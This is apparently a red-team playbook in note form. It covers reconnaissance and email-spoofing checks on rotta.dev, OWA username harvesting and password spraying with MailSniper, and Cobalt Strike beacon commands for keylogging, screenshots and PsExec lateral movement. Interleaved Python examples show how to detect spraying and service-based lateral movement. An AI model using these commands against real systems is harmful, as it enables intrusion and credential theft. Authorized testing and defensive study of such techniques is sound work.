Google dorking is an incredibly powerful and simple method of finding more information about a target.
Social Media
Social media is an invaluable resource for finding information. A red team should have accounts on all major social media platforms; LinkedIn Premium is a must-have. It is wise to create a burner account for every engagement. Here are some things to find on social media:
Web Servers
$ dig rotta.dev
;; ANSWER SECTION:
rotta.dev. 3600 IN A 76.223.105.230
rotta.dev. 3600 IN A 13.248.243.5
$ whois rotta.dev
OrgName: Amazon.com, Inc.
OrgId: AMAZO-4
Address: Amazon Web Services, Inc.
Address: P.O. Box 81226
City: Seattle
StateProv: WA
PostalCode: 98108-1226
Country: US
RegDate: 2005-09-29
Updated: 2022-09-30
Comment: For details of this service please see
Comment: http://ec2.amazonaws.com
Ref: https://rdap.arin.net/registry/entity/AMAZO-4
$ ~/dnscan$ ./dnscan.py -d rotta.dev -w subdomains-100.txt
[*] Scanning rotta.dev for A records
76.223.105.230 - www.rotta.dev
199.32.90.122 - mail.rotta.dev
(Alternatively, we can use crt.sh or the like to do this. However, dnscan resolves
IP addresses, which is incredibly useful for determining whether a subdomain is hosted
on a separate, or possibly internal, server.)
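The triage the note describes (which subdomains share the apex's address, which sit on separate hosts, and which resolve to internal address space that should never appear in public DNS) can be automated over dnscan's output. This is an added example, not part of the original notes or of dnscan; the scan output and the apex addresses are constructed to match the dig and dnscan runs above, with two extra internal-looking entries added for illustration.

```python
import ipaddress
from collections import defaultdict

# Constructed sample in dnscan's "IP - hostname" output format (not real scan data).
SAMPLE_DNSCAN_OUTPUT = """\
[*] Scanning rotta.dev for A records
76.223.105.230 - www.rotta.dev
13.248.243.5 - www.rotta.dev
199.32.90.122 - mail.rotta.dev
10.20.30.40 - intranet.rotta.dev
192.168.1.15 - dev.rotta.dev
199.32.90.122 - autodiscover.rotta.dev
"""

def parse_dnscan(text):
    """Return (ip, hostname) pairs from dnscan-style output, skipping status lines."""
    pairs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):
            continue
        ip, sep, host = line.partition(" - ")
        if not sep:
            continue
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue                      # not an address, ignore the line
        pairs.append((ip, host))
    return pairs

def triage(pairs, apex_ips):
    """Classify each resolved subdomain relative to the apex domain's addresses.

    'internal'  hostnames resolving to RFC 1918 / loopback / link-local space
                (internal addresses leaked into public DNS, a finding to report)
    'separate'  hostnames on public addresses that differ from the apex
    'same'      hostnames sharing an address with the apex domain
    """
    result = {"internal": [], "separate": [], "same": []}
    by_host = defaultdict(set)
    for ip, host in pairs:
        by_host[host].add(ip)
    for host, ips in sorted(by_host.items()):
        addrs = [ipaddress.ip_address(ip) for ip in ips]
        if any(a.is_private or a.is_loopback or a.is_link_local for a in addrs):
            result["internal"].append(host)
        elif ips & set(apex_ips):
            result["same"].append(host)
        else:
            result["separate"].append(host)
    return result
```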
Email Security
Weak email security (SPF, DMARC and DKIM) may allow us to spoof emails to appear as though they’re coming from their own domain.
$ ~/Spoofy$ pip3 install -r requirements.txt
$ ~/Spoofy$ python3 spoofy.py -d rotta.dev -o stdout
[*] Domain: rotta.dev
[*] Is subdomain: False
[*] DNS Server: 1.1.1.1
[?] No SPF record found.
[?] No DMARC record found.
[+] Spoofing possible for rotta.dev
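The judgement Spoofy prints above comes down to what a receiving mail server would do with a forged From: header: SPF alone only covers the envelope sender, so a domain is spoofable unless an enforcing DMARC policy is published. The following is an added example of that assessment, not Spoofy's own code; the TXT answers are constructed (rotta.dev mirrors the empty result above, the two .example domains are invented), and a real check would feed in live TXT lookups instead.

```python
import re

# Constructed DNS TXT answers keyed by name (not live lookups; Spoofy queries DNS itself).
SAMPLE_TXT = {
    "rotta.dev": [],                                   # no SPF, as in the Spoofy run above
    "_dmarc.rotta.dev": [],                            # no DMARC either
    "hardened.example": ["v=spf1 include:_spf.example.net -all"],
    "_dmarc.hardened.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@hardened.example"],
    "monitoring.example": ["v=spf1 ip4:203.0.113.0/24 ~all"],
    "_dmarc.monitoring.example": ["v=DMARC1; p=none; pct=100"],
}

def get_spf(txt, domain):
    """Return the single SPF record, or None if absent or duplicated (duplicates are a permerror)."""
    recs = [r for r in txt.get(domain, []) if r.lower().startswith("v=spf1")]
    return recs[0] if len(recs) == 1 else None

def get_dmarc(txt, domain):
    """Return the DMARC tags as a dict, or None if nothing is published at _dmarc.<domain>."""
    recs = [r for r in txt.get("_dmarc." + domain, []) if r.upper().startswith("V=DMARC1")]
    if not recs:
        return None
    return {k.lower(): v.strip() for k, v in re.findall(r"(\w+)\s*=\s*([^;]+)", recs[0])}

def assess(txt, domain):
    """Return (spoofable, reasons) for a domain, judged the way a receiving MTA behaves."""
    reasons = []
    spf = get_spf(txt, domain)
    if spf is None:
        reasons.append("no usable SPF record")
    else:
        tail = spf.split()[-1].lower()
        if tail in ("all", "+all"):
            reasons.append("SPF ends with +all: every sender passes")
        elif tail in ("~all", "?all"):
            reasons.append("SPF ends with %s: forged mail is not hard-failed" % tail)
    dmarc = get_dmarc(txt, domain)
    policy = (dmarc or {}).get("p", "none")
    pct = int((dmarc or {}).get("pct", "100"))
    if dmarc is None:
        reasons.append("no DMARC record: receivers will not enforce alignment")
    elif policy == "none":
        reasons.append("DMARC p=none: monitoring only, nothing is quarantined or rejected")
    elif pct < 100:
        reasons.append("DMARC pct=%d: only part of the mail stream is policed" % pct)
    # Header-From forgery is only stopped by an enforcing DMARC policy applied to all mail.
    spoofable = dmarc is None or policy == "none" or pct < 100
    return spoofable, reasons
```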
Office 365
People
(TODO Include Mindmap screenshot here or organization).
Initial Compromise
OWA Password Spraying
Far from the best method of gaining access these days. All eyes from the SOC are on you when performing these attacks. That said, password spraying incidents cause massive alert bloat for the blue team. Some orgs may decide to exclude this activity from scope entirely because they already have measures in place to mitigate it: account lockouts, Conditional Access Policy (CAP), etc.
Generate username wordlist
There are many wordlist generators out there for usernames. Will not name them.
$ ~/namemash.py users.txt > usernames.txt
Determine valid domain
PS C:\Users\PaulBlart\> ipmo C:\Tools\MailSniper\MailSniper.ps1
PS C:\Users\PaulBlart> Invoke-DomainHarvestOWA -ExchHostname mail.rotta.dev
[*] Harvesting domain name from the server at mail.rotta.dev
The domain appears to be: CYBER or rotta.dev
Find Valid Usernames Password
Authentication attempts against valid usernames take a little longer to process than those against invalid usernames; from this timing difference we can determine whether a username in our wordlist is valid.
PS C:\Users\PaulBlart> Invoke-UsernameHarvestOWA -ExchHostname mail.rotta.dev -Domain rotta.dev -UserList .\Desktop\usernames.txt -OutFile .\Desktop\valid_usernames.txt
[*] Now spraying the OWA portal at https://199.32.90.122/owa/
Spray Passwords
If we decide to carry out this attack, it's best to take our time with it (depending on the engagement timeframe). As red teamers we are unable to determine the account lockout configuration without access to the domain.
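The blue-team side of the username harvesting and spraying described in the last two steps: a lockout-aware sprayer keeps failures per account low, so per-account alerting misses it, and the complementary signal is one source address failing against many distinct accounts in a short window. This is an added detection example, not from the original notes or MailSniper; the log lines are constructed (timestamp, source IP, username, outcome) and the window and threshold are assumptions to tune against a real baseline.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed authentication log lines; not a real OWA or sign-in log export.
SAMPLE_LOG = """\
2024-03-01T09:00:01 203.0.113.7 rotta.dev\\nancy FAIL
2024-03-01T09:00:03 203.0.113.7 rotta.dev\\cassy FAIL
2024-03-01T09:00:05 203.0.113.7 rotta.dev\\pblart FAIL
2024-03-01T09:00:07 203.0.113.7 rotta.dev\\jdoe FAIL
2024-03-01T09:00:09 203.0.113.7 rotta.dev\\asmith FAIL
2024-03-01T09:00:11 203.0.113.7 rotta.dev\\bjones SUCCESS
2024-03-01T09:05:00 198.51.100.9 rotta.dev\\nancy FAIL
2024-03-01T09:05:30 198.51.100.9 rotta.dev\\nancy FAIL
2024-03-01T09:06:00 198.51.100.9 rotta.dev\\nancy SUCCESS
"""

def parse(text):
    """Turn the constructed log format into (datetime, ip, user, outcome) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, outcome = line.split()
        events.append((datetime.fromisoformat(ts), ip, user.lower(), outcome))
    return events

def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Flag source IPs that fail against >= min_users distinct accounts inside `window`.

    Returns {ip: {"users": set of accounts tried, "success": set of accounts that
    logged in from that IP while it was spraying}}; the latter is the reset-first list.
    """
    recent = defaultdict(deque)          # ip -> deque of (ts, user) failures in window
    findings = {}
    for ts, ip, user, outcome in sorted(events):
        q = recent[ip]
        while q and ts - q[0][0] > window:   # expire failures older than the window
            q.popleft()
        if outcome == "FAIL":
            q.append((ts, user))
        users = {u for _, u in q}
        if len(users) >= min_users:
            f = findings.setdefault(ip, {"users": set(), "success": set()})
            f["users"] |= users
            if outcome == "SUCCESS":
                f["success"].add(user)
    return findings
```

The second source in the sample (one user, three tries) is a plain forgotten password and is not flagged, which is the distinction per-account lockout thresholds alone cannot make.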
Post Compromise - Enumeration & Reconnaissance
Harvested O365 Credentials
Download Global Address List
Download global email address list with MailSniper.
beacon> keylogger
[+] received keystrokes from *Untitled - Notepad by nancy
beacon> jobs
[*] Jobs
JID PID Description
--- --- -----------
1 0 keystroke logger
beacon> jobkill 1
Screenshots
printscreen Take a single screenshot via PrintScr method
screenshot Take a single screenshot
screenwatch Take periodic screenshots of desktop
Clipboard
beacon> clipboard
User Sessions
beacon> net logons
Logged on users at \\localhost:
DEV\nancy
DEV\cassy
DEV\PWNBOX$
Windows Registries
Tasks
Processes
Hunting for COM Hijacking
Post Compromise - Host Privilege Escalation
TODO Add this
Windows Services
Post Compromise - Persistence
Persistence - SharPersist & Cobalt Strike
Task Scheduler
AutoRun Registry
Post Compromise - Elevated SYSTEM Persistence
TODO Add this
Windows Services
Post Compromise - Credential Theft
Lateral Movement
Cobalt Strike provides three strategies for executing Beacons/code/commands on remote targets. Most lateral movement techniques leverage legitimate Windows management functionality, as this type of traffic and activity is not unusual to see on a network.
Cobalt Strike Commands
jump
beacon> jump
remote-exec
When using remote-exec you need to connect to P2P Beacons manually using connect or link.
beacon> remote-exec
execute-assembly
This is entirely custom. Custom methods can be integrated into the jump and remote-exec commands using Aggressor.
[+] established link to child beacon: 10.10.122.30
PsExec
The PsExec commands upload a service binary to the target system, then create and start a Windows service to execute the binary. Beacons spawned this way run as SYSTEM.
Copies Binary to target:
beacon> jump psexec64 web.rotta.lab smb
[+] established link to child beacon: 10.10.122.30
Doesn't copy a binary, but runs PowerShell instead:
beacon> jump psexec_psh web smb
[+] established link to child beacon: 10.10.122.30
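Because both PsExec variants above work by installing and starting a service, the host-side artifact to watch is the System log's "service was installed" record (Event ID 7045). The following is an added triage example, not from the notes or Cobalt Strike; the records are constructed, and the shapes they mimic (a binary dropped on an admin share for the binary variant, a command interpreter launching encoded PowerShell for the PowerShell variant, a short tool-generated service name for both) are assumptions to check against your own baseline rather than documented defaults.

```python
import math
import re
from collections import Counter

# Constructed "7045: A service was installed" records, not real telemetry.
SAMPLE_7045 = [
    {"ServiceName": "WinDefend", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Program Files\Windows Defender\MsMpEng.exe"},
    {"ServiceName": "a3f9c1b", "AccountName": "LocalSystem",
     "ImagePath": r"\\127.0.0.1\ADMIN$\a3f9c1b.exe"},
    {"ServiceName": "7d2e0f4", "AccountName": "LocalSystem",
     "ImagePath": r"%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand SQBFAFgA"},
    {"ServiceName": "BackupSvc", "AccountName": r"NT AUTHORITY\NetworkService",
     "ImagePath": r"C:\Program Files\Vendor\backup.exe"},
]

def shannon_entropy(s):
    """Bits of entropy per character; random tool-generated names score high."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def classify_service_install(ev):
    """Return the reasons a 7045 record looks like a remote service-based push.

    Each heuristic is a hint, not proof, and is an assumption of this example:
      * image path on an administrative share: binary dropped over SMB
      * COMSPEC spawning PowerShell with -encodedcommand: no binary on disk
      * short random-looking service name: generated rather than vendor-chosen
    """
    reasons = []
    path, name = ev["ImagePath"], ev["ServiceName"]
    if re.search(r"\\\\[^\\]+\\(ADMIN|C)\$\\", path, re.IGNORECASE):
        reasons.append("image path on an administrative share")
    if "COMSPEC" in path.upper() and re.search(r"powershell.*-e(?:nc|ncodedcommand)?\b",
                                              path, re.IGNORECASE):
        reasons.append("COMSPEC launching encoded PowerShell")
    if re.fullmatch(r"[a-z0-9]{7,8}", name, re.IGNORECASE) and shannon_entropy(name.lower()) > 2.5:
        reasons.append("random-looking service name")
    return reasons

def suspicious_installs(events):
    """Map each flagged service name to its reasons; clean records are dropped."""
    return {ev["ServiceName"]: r for ev in events if (r := classify_service_install(ev))}
```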